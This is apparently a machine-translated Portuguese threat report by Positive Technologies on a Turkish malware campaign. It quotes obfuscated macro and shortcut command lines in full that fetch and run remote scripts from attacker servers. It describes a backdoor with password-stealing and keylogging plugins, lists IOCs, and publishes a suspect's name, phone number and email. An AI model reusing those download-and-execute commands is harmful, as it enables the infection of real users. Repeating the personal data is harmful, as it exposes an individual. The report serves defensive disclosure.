Truques turcos com vermes, ratos ... e um freelancer

Os especialistas do grupo de pesquisa de ameaças do Positive Technologies Security Center (PT Expert Security Center) descobriram uma campanha maliciosa que está ativa desde pelo menos meados de janeiro de 2018. A operação é direcionada a usuários do Brasil, Reino Unido, Hungria, Alemanha, Letônia, EUA, Turquia e Filipinas. Uma variedade de ferramentas e técnicas são usadas para infectar e controlar o PC da vítima. Este relatório detalha o estágio da infecção, os utilitários usados, os recursos de organização da infraestrutura de rede, bem como os traços digitais que nos levaram a nos tornar um candidato hacker.

Sumário


  • Os invasores processaram o worm há 10 anos, levando em consideração as técnicas modernas
  • O zoológico de ferramentas usadas em conjunto com uma extensa infraestrutura de rede
  • O principal suspeito é um freelancer turco

Entrega de carga


Documentos do Office


Em 5 de abril de 2019, como parte do rastreamento de novas ameaças, os especialistas do PT Expert Security Center descobriram um documento suspeito do escritório. Arquivo com a extensão .docm (documento do MS Word de uma nova amostra com suporte a macro):

  • criado alguns dias antes da descoberta (31/03/2019),
  • contém uma imagem para convencer o usuário a ativar macros,
  • foi criado em um sistema com o idioma turco (isso é evidenciado pelos valores dos campos de metadados: "Konu Başlığı" - "Título do tópico", "Konu Ba l, 1" - "Subject Heading, 1"; tradução do Google Translate).



Fig. 1. Armadilha de notificação macro típica

O código da macro é um pouco ofuscado, mas lacônico: usando o cmdlet Background Intelligent Transfer Management (BITS) para PowerShell, ele baixa e executa um script em JScript no servidor de um invasor:

Shell ("pow" & "ershe" & "ll -comm" & "and ""$h1='e';&('i' + $h1 + 'x')('Import-Module BitsTransfer;Start-BitsTransf' + $h1 + 'r https://definebilimi.com/1/b12.js $env:t' + $h1 + 'mp\bb1.js;');Start-Process -WindowStyle hidden -FilePath 'cmd.exe' -ArgumentList '/c %systemroot%\system32\wscript %temp%\bb1.js'""") 

O uso do PowerShell e um módulo atípico para baixar arquivos de um servidor da Web é devido a uma tentativa de contornar as restrições ao lançamento e execução de programas não confiáveis.

Existem vários documentos semelhantes. Por exemplo, um deles é um arquivo .doc (um documento antigo do MS Word) com uma página de código de caracteres em turco. O trabalho de macro também é muito semelhante:

 Shell "cmd.exe /c bitsadmin /transfer myjob /download /priority FOREGROUND https://definebilimi.com/up3e.js %temp%\o2.js & wscript.exe %temp%\o2.js", vbHide 

Nesse caso, o autor usa a mesma tecnologia BITS, mas com a ajuda do utilitário legítimo do sistema bitsadmin. Curiosamente, a data em que o documento foi criado e a hora em que foi descoberta em fontes públicas nos enviaram até meados de julho de 2018. Assim, os ataques são relevantes por pelo menos cerca de um ano. Além disso, o mesmo servidor atacante é usado para baixar a carga útil; a abordagem para nomear um script carregável no JScript é semelhante.

Outro documento possui a extensão .rtf (Rich Text Format). Ele contém vários documentos .xls (documento antigo do MS Excel) com o mesmo conteúdo. O código da macro é completamente idêntico ao extraído do documento original, e a coincidência dos valores da página de códigos e do campo XML do HeadingPairs leva à mesma autoria.

Atalhos do LNK


Vale ressaltar que nesta campanha, não apenas os documentos do escritório foram usados ​​como o estágio inicial da infecção. Conhecemos alguns arquivos .lnk maliciosos (Windows Shell Link), que, quando lançados, executavam o seguinte comando:

 C:\Windows\System32\cmd.exe /c powershell -command "$h1='e';&('i' + $h1 + 'x')('Import-Module BitsTransfer;Start-BitsTransf' + $h1 + 'r https://definebilimi.com/1/b12.js $env:t' + $h1 + 'mp\bb.js;')" & %systemroot%\system32\wscript %temp%\bb.js 

Os rótulos foram distribuídos em meados de março e final de abril de 2019.

Os metadados de atalho contêm o nome de usuário win7-bilgisayar (do turco “win7-computer”) - o usuário do sistema em que foram criados.

Podemos assumir com segurança que os e-mails de phishing são o cenário mais provável para a entrega de arquivos maliciosos no primeiro estágio da infecção.

Houdini Metamorphoses


Todos os objetos examinados do primeiro estágio da infecção são baixados e executam o mesmo script no JScript (sem levar em consideração pequenas diferenças). O arquivo não é ofuscado nem empacotado, e a única coisa que foi feita para complicar a análise são nomes de variáveis ​​aleatórios. É um backdoor na plataforma WSH. Das características de seu trabalho, podemos destacar:

  • O endereço do host e a porta do servidor de gerenciamento são protegidos em um script
  • A interação com C&C é realizada por meio de solicitações POST do protocolo HTTP.
  • No momento do início do trabalho, a string "is-bekle" é inserida no campo URI, traduzida do turco como "is-ready".
  • O campo User-Agent contém informações breves sobre o sistema com o delimitador especificado (neste caso, "<|>"):
    • O número de série do disco rígido
    • nome de usuário
    • versão do sistema
    • nome do script
    • nome do antivírus
    • valor da variável de ambiente% ProgramData%,
    • a presença do .Net FrameWork 4.5.2 no sistema,
    • tempo limite entre solicitações,
    • Java no sistema.

  • Verifica o ambiente quanto ao assunto da caixa de proteção da Kaspersky Lab pelo número de série fornecido no disco rígido. Em caso de coincidência, para de funcionar.
  • Ele recebe do servidor e executa os comandos fornecidos; Aqui estão alguns deles:
    • baixar um arquivo do servidor,
    • fazer upload de arquivo para o servidor
    • coletando o conteúdo da área de transferência,
    • coleção de conteúdo do catálogo,
    • coleta de informações do processo,
    • executando comandos no interpretador cmd.exe,
    • tirar e enviar uma captura de tela,
    • Recupere e envie bancos de dados Chrome e Opera com senhas.



Fig. 2. O início do script carregado no JScript a partir do servidor atacante

Pela presença de comentários, a estrutura do código, os nomes dos comandos utilizados e o formato para coletar informações sobre o sistema, pode-se traçar um paralelo com o conhecido worm VBS Houdini. Em 2013, nossos colegas da FireEye forneceram uma análise detalhada das funções desse cavalo de Troia, o processamento de comandos e a coleta de informações nas quais elas ocorrem de maneira semelhante. Parece que, no nosso caso, o atacante tomou como base o modelo do worm conhecido, reescreveu as funções não no VBScript, mas no JScript, e substituiu algumas linhas em inglês pelas turcas.



Fig. 3. Processando comandos backdoor JScript

Vale ressaltar que, como marcador dos resultados da execução de comandos, são utilizadas seqüências contendo a subcadeia “Bcorp”. Também está presente no nome do servidor de gerenciamento ip1 [.] Bcorp.fun.

Em um servidor atacante


De acordo com Shodan, em 30 de abril de 2019, um invasor hospedava um servidor da Web baseado no AppServ . Não parece que o servidor tenha sido cuidadosamente configurado: por exemplo, a página phpinfo está disponível, o que revela informações interessantes sobre a configuração. Ao analisar os links da Web dos quais o malware foi baixado, o servidor tinha um diretório aberto (diretório ./a) listando as ferramentas de outros invasores.



Fig. 4. Página inicial do servidor atacante



Fig. 5. página phpinfo no servidor atacante



Fig. 6. Listagem do diretório aberto do servidor atacante no final de abril de 2019



Fig. 7. Lista do diretório aberto do servidor atacante no final de maio de 2019

Abaixo está uma descrição dos arquivos detectados.

Houdini jscript


Primeiro, recebemos muitas variações do worm Houdini modificado, discutido acima. De versão para versão, o script passou por pequenas alterações: nomes de host (husan2.ddns.net, ip1.bcorp.fun, ip1.qqww.eu), portas (86, 87), nomes de variáveis, comandos individuais que apareceram ou desapareceram. Uma versão foi enquadrada como um scriptlet no JScript.



Fig. 8. Houdini JScript como um scriptlet

Frasco Bcorp


Backdoor Java leve e auto-fabricado. Ele interage com o C&C sobre TCP na porta 22122. Pode:

  • executar comandos no interpretador cmd.exe,
  • determinar a versão do sistema
  • Listar diretórios
  • fazer upload de arquivos
  • registre-se no diretório de inicialização e na ramificação de inicialização do registro.

Parece que é exatamente por isso que o worm modificado verifica o Java no sistema. Ao mesmo tempo, não está claro por que usar um backdoor adicional, porque o original possui um conjunto suficiente de funções.

Get-chromecreds


Wrapper do PowerShell para extrair histórico, logins, senhas e cookies do navegador Chrome. Algumas versões contêm a biblioteca auxiliar System.Data.SQLite.dll para sistemas x86 e x64 no formato codificado em base64, enquanto outras assumem sua presença no diretório% APPDATA%. O componente vem como um plug-in auxiliar para o backdoor principal do JScript.

Start-keylogger


Implementação do PowerShell de um keylogger simples. O componente vem como um plug-in auxiliar para o backdoor principal do JScript.



Fig. 9. Snippet de código do PowerShell Keylogger

WebBrowserPassView


Um utilitário da Nirsoft para obter logins e senhas de navegadores populares. Os invasores usaram a versão do autor, tendo-a embalado anteriormente com o ASPack para complicar a análise ou ignorar a detecção por indicadores.

NetWire RAT


Uma ferramenta comercial e publicamente disponível para controle remoto do PC. Usado por vários grupos de cibercriminosos. Os desenvolvedores de malware complicaram a análise e a descoberta colocando o RAT no PE na plataforma .NET e usando o ofuscador de código DeepSea 4.1.

Escuta TCP


Um simples utilitário da GUI da AllScoop para testar os parâmetros de um roteador ou firewall. Cada porta de atendimento responde com uma determinada sequência, encerrando a conexão.



Fig. 10. GUI do TCP Listen Utility

Carregador Lnk


Carregador de atalho, semelhante aos já considerados anteriormente. Na inicialização, executa o seguinte comando:

 C:\Windows\System32\cmd.exe /v /c "set i=h&&ms!i!ta http://ip1.qqww.eu/1/f.htm" 

Desta vez, o atalho foi criado sob outro usuário (desktop-amkd3n3).

Carregadores de scripts


Neste grupo, combinamos os vários gerenciadores de inicialização do RAT acima. Todos eles são pequenos (até 1 KB), em vários formatos (.htm, .xsl, .hta etc.), o código é executado em várias linguagens de script (JScript, PowerShell) e compilado em tempo real C #. Abaixo estão alguns trechos de código de alguns exemplos:



Fig. 11. Fragmento do carregador .htm



Fig. 12. Fragmento do gerenciador de inicialização .xsl



Fig. 13. Fragmento do gerenciador de inicialização .ps1

Carregadores pe minúsculos


Além dos carregadores de scripts, os arquivos PE na plataforma .NET foram descobertos. Eles também são pequenos (até 10 KB), com funcionalidade semelhante:



Fig. 14. Um exemplo de código descompilado de um dos carregadores de PE

xRAT


Um projeto publicamente disponível e distribuído gratuitamente para gerenciamento remoto de PC. Várias versões e modificações são generalizadas. Escrito em C #, parcialmente ofuscado.

Painel Bcorp vs. construtor


A parte do servidor de controle para a backdoor JScript. Ao mesmo tempo, é o designer da parte do cliente. Representa o PE na plataforma .NET. Não ofuscado, não embalado. A interface se assemelha a uma parte do servidor reprojetada para o já mencionado vírus WBS Houdini. Além de enviar comandos, ele baixa componentes e plug-ins adicionais descritos anteriormente na máquina infectada: ambiente Java, scripts do PowerShell e um utilitário da Nirsoft para coletar informações de navegadores, scripts do PowerShell para interceptar pressionamentos de teclas etc. É curioso que o projeto se chame BcorpRat , que pode ser visto no título da janela nas imagens abaixo. E no nome do espaço para nome do código fonte está a linha "Btech", à qual retornaremos mais tarde.



Fig. 15. painel de controle da porta traseira JScript, janela principal



Fig. 16. O painel de controle JScript-backdoor, a janela de designer da parte do cliente

Infraestrutura de rede


Em seguida, realizaremos uma análise mais detalhada dos endereços com os quais esses ou outros programas maliciosos do invasor interagiram. Vamos começar com o domínio definebilimi.com, que é acessado por documentos do escritório e carregadores de atalho.

definebilimi.com


Em 16 de janeiro de 2018, este domínio tem um novo proprietário. A propósito, "define bilimi" é traduzido literalmente do turco como "um tesouro da ciência". Abaixo estão os dados mais interessantes da história dos registros WHOIS na época.
Tabela 1. Informações sobre o registrante (proprietário) do domínio definebilimi.com

Nome do registroValor do registro
Nome do registranteKoray Yaman
Rua registrante123456
Cidade registranteIstambul
País registranteTR
Telefone do Registrante+90.5350167352
Email do Registrantebtech@hotmail.com.tr

Será imprudente afirmar que os dados são genuínos. O país indicado e a frequência de ocorrência de traços do idioma turco no código permitem supor que essas correspondências não sejam acidentais. E o endereço de email contém a substring "btech", à qual já prestamos atenção.

O histórico de alterações nos servidores NS que forneceram informações sobre o domínio registrado parece interessante:

DataAcçãoServidor
17/03/2018Nova entradabuhar.biz
15/01/2019Alteração de registrodefinebilimi.com
06/04/2019Alteração de registroqqww.eu

Tabela 2. Histórico de servidores NS para o domínio definebilimi.com

Os hosts buhar.biz e qqww.eu já foram encontrados em malware anteriormente.

buhar.us


A nova história deste domínio ("buhar" do turco - "casais") começa no mesmo dia que a história do definebilimi.com - 16 de janeiro de 2018.

Nome do registroValor do registro
Nome do registrantebalta zar
Organização registranteBuharus
Rua registranteGizli
Cidade registranteGizli
País registranteTR
Telefone do Registrante+1.123456789
Email do Registrantebuharcin@yandex.com

Tabela 3. Informações sobre o registrante (proprietário) do domínio buhar.us

A situação é semelhante: novamente, alguns dados parecem falsos, exceto o endereço postal ("buharcin" do turco - "locomotiva").

bcorp.fun


O domínio está registrado desde 23 de março de 2019. Além do fato de a Turquia estar novamente registrada como país, a Bcorp está listada como organização cliente. Na verdade, vemos a mesma coisa no próprio nome de domínio, como em vários parágrafos anteriores.

husan2.ddns.net


É curioso que o atacante adquira hosts não apenas da maneira clássica. Desde meados de março de 2019, o uso dos chamados servidores DNS dinâmicos foi registrado. A tecnologia permite que os invasores ocultem efetivamente seus endereços IP e garantam a vitalidade de seus centros de controle. Vale ressaltar alguma previsibilidade na escolha dos nomes: por exemplo, após alguns meses, o uso do domínio husan3.ddns.net foi descoberto, mas a atividade do domínio husan.ddns.net data de abril de 2017.

bkorp.xyz


Desde o início de abril, o hacker, continuando o caminho do anonimato, registra domínios usando o serviço WhoisGuard, Inc., localizado no Panamá; bkorp.xyz, prntsrcn.com e i37-imgur.com são apenas alguns exemplos. Os servidores NS usados ​​ainda os vinculam a outros domínios maliciosos.

qqww.eu


Além do fato de esse domínio, como o domínio bcorp.fun, possuir um subdomínio ip1, há outro detalhe importante. As informações do registrante indicam a organização Osbil Technology Ltd., supostamente localizada em Berlim. De fato, a organização com o mesmo nome está localizada na costa de Chipre, na cidade de Famagusta - no território da República Turca do Norte de Chipre, parcialmente reconhecida. E o site oficial da empresa está localizado no domínio, que era o servidor NS do domínio bcorp.fun de março a maio de 2019. Não encontramos nenhum sinal de comprometimento do servidor de nomes, e os recursos de infraestrutura do provedor NS (substituindo o cliente pelos dados do provedor na coluna registrante) tornaram possível ocultar as informações do cliente do acesso público.



Fig. 17. Informações sobre o registrante (proprietário) do domínio qqww.eu

Endereços IP


Para completar, abaixo estão os endereços IP - com alguns domínios correspondentes a eles em diferentes intervalos de tempo:
  • 5.255.63.12
    • bcorp.fun
    • husan.ddns.net
    • husan2.ddns.net
    • husan3.ddns.net
    • qqww.eu

  • 192.95.3.137
    • bcorp.fun
    • bkorp.xyz
    • definebilimi.com
    • i36-imgur.com
    • i37-imgur.com
    • i38-imgur.com
    • i39-imgur.com
    • prntsrcn.com
    • qqww.eu

  • 192.95.3.140
    • bkorp.xyz
    • buhar.us

    Na sequência do hacker


    Entre as ferramentas maliciosas e auxiliares, uma imagem curiosa foi encontrada no servidor do invasor:



    Fig. 18. A imagem no diretório na hospedagem do atacante

    Não reduzimos a resolução da imagem, mas a colocamos aqui da forma que estava no host.

    Apesar da baixa qualidade da imagem, conseguimos estabelecer que esta é uma captura de tela de uma página sobre uma transação concluída com criptomoeda no recurso blockr.io. Como não funcionou, tentamos encontrar tudo relacionado ao nome IMG_JPEG-0371e4dce3c8804f1543c3f0f309cc11.jpg com o qual a imagem foi armazenada pelo hacker. Os rastreamentos levaram ao resultado do processamento em um analisador on-line de um arquivo cujo nome coincidisse com o nome da nossa imagem. O objeto processado é um atalho do Windows, semelhante aos que já examinamos anteriormente. Uma foto foi anexada a ele com uma fotografia do cartão de identificação de um cidadão turco, cujo sobrenome coincide com o sobrenome indicado no registro do domínio - Yaman.



    Fig. 19. Cartão de identificação com carregador de inicialização

    O processamento do atalho na sandbox online não ocorreu como resultado do usuário baixando o arquivo, mas transmitindo a URL da qual era necessário fazer o download e processar o objeto:

    hxxps://github.com/btechim/prntsrcn/blob/nm46ny/IMG-0371e4dce3c8804f1543c3f0f309cc11.jpg.lnk?raw=true

    A conta github do usuário já está bloqueada. No entanto, usando o link, podemos definir o apelido do usuário (btechim) e o nome do projeto (prntsrcn). O nome do projeto coincide com o nome de um dos domínios encontrados na campanha (prntsrcn.com) e o apelido do usuário contém a substring btech, que aparece no código do programa dos painéis de administração mencionados acima.

    A pesquisa do apelido do usuário nos levou ao recurso de freelancers no qual a página do usuário da Turquia está localizada - com o mesmo apelido, com um número de telefone confirmado, endereço para correspondência e perfil do Facebook - oferecendo seus serviços no desenvolvimento de software no campo da segurança cibernética.



    Fig. 20. A página do suposto invasor no recurso para freelancers

    Conclusões


    Durante vários meses, os especialistas da Positive Technologies monitoraram o desenvolvimento de uma campanha maliciosa de origem turca e transferiram os dados acumulados para o CERT Turquia. Está longe de ser frequente que, durante uma série de ataques, o uso de técnicas modernas e ferramentas recicladas 10 anos atrás seja combinado. O invasor usou uma variedade de ferramentas (por objetivo, por plataforma, por nível de dificuldade) para obter controle completo sobre o PC de destino. Vale ressaltar a variabilidade das abordagens na preparação da infraestrutura de rede na tentativa de ocultar sua identidade. No entanto, mais uma vez nem tudo foi levado em consideração, a arrogância e várias omissões foram emitidas pelo infrator. O estudo foi encaminhado ao Centro de Resposta a Incidentes de Segurança da Informação da Turquia.

    COI
    Carregadores de escritório:
    3305720da73efbcb7d25edbb7eff5a1a
    5b6d77f3e48e7723498ede5d5ba54f26
    621a0133e28edec77a2d3e75115b8655
    712e7ec49ad3b8c91b326b6d5ee8dcd8
    731a3d72e3d36c2270c1d0711c73c301
    929374b35a73c59fe97b336d0c414389

    Carregadores LNK:
    3bc5d95e2bd2d52a300da9f3036f5b3b
    527069e966b4a854df35aef63f45986a
    a4667e0b3bfaca0cda5c344f1475b8e0

    Houdini JScript:
    04c2ad67de2cea3f247cf50c5e12e969
    5ab9176b9ed9f7a776ec82c412a89eab
    84f0d098880747f417703f251a2e0d1c
    94c6ba0d812b4daf214263fffc951a20
    a52509a38846b55a524019f2f1a06ade
    bf2fb6cdbc9fde99e186f01ad26f959f
    c871091ce44594adbd6cf4388381e410
    daf6a9eb55813d1a151695d33506179d
    f010af1b330d00abb5149e9defdae6ee
    ff924faeb9dfd7384c05abe855566fc9

    Frasco Bcorp
    59978b5a9e4ab36da0f31a8f616cc9d3
    a7219da3b0c0730c476fe340dbf7e4e5
    ddac55213089da9ef407bce05ebe653e

    Get-chromecreds
    11769e9f49123a2af00bd74453221c07
    1a81c9119d7761535c198ddb761979b8
    42a85849a591e65b0254d9bcbdf59f82
    8e49263f33c53ee5bc91bebbf9617352
    c9ab090ad2badb9862fd5b6058428096

    Start-keylogger
    55daa84475a11ea656183e0ad5ccc608
    aa82fbb6a341d71d2431b6d2ebca027c

    WebBrowserPassView
    7722e086cf7ed59955a1d6ec26f49cf3

    NetWire RAT
    1470a08bd427bb8738a254ba4f130ff5
    5f8495016773c7834b1c588f0997a6c4

    Escuta TCP
    913567da98185cad9f91a570dc298de1

    Carregadores de scripts
    02946d10c6a34fe74826f3c0b0a6a3e0
    1ad644bdba488a6e42ad76aea2c0ee54
    3a2dcf36b9206a135daa73c645a3f56f
    4dddd87d3cb80145c9859fd76dfef794
    74c5e5be9f79bd9e7ee84fd046c14e68
    78f4d5fa6c68dae4b03860b54ec6cc67

    Carregadores pe minúsculos
    0f3c56018a7051aebe060454fc981f5b
    1b9cefc229daddc4557cea0e3bdf4656
    29e6679107bd9c72aa061371082206bb
    b66b7395825b9ed656b768d4e7fe1de7
    fbc606b8b04e51ddb342e29b84ac1edb

    xRAT
    2e9a0637478938cc3e4519aa7b4219cc
    7c67c93ba243be32e5fd6a6921ceded3

    Painel Bcorp vs. construtor
    405c987ba1a8568e2808da2b06bc9047
    c3ac8b7a7c8c0d100e3c2af8ccd11441

    Bcorp C&C
    bcorp.fun
    bkorp.xyz
    buhar.us
    definebilimi.com
    husan.ddns.net
    husan2.ddns.net
    husan3.ddns.net
    i36-imgur.com
    i37-imgur.com
    i38-imgur.com
    i39-imgur.com
    prntsrcn.com
    qqww.eu
    5.255.63.12
    192.95.3.137
    192.95.3.14


    Postado por Alexey Vishnyakov, Positive Technologies

Source: https://habr.com/ru/post/pt479998/


All Articles